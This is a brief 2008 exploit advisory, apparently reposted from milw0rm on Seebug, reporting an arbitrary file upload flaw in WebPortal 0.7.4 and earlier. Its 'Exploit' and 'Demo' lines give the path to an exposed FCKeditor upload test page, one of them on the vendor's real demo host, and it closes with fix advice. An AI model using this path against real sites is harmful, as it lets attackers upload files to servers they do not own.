######################################################################## # # S.W.A.T. # # Title: WebPortal <= 0.7.4 (fckeditor) Remote Arbitrary File Upload # # Vendor: http://webportal.ivanoculmine.com/download.php?mid=14 # # Discover by : S.W.A.T. # # svvateam@yahoo.com # # Impact: Medium # # Fix: Disable It In The Config File ;) # # Site: wWw.SvvaT.IR # ######################################################################## #################### - Exploit: #################### http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html #################### - Demo: #################### http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html #################### - Solution: #################### Restrict and grant only trusted users access to the resources. #################### - GreTzZ : #################### All My Friend's , Str0ke #################### # milw0rm.com [2008-09-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论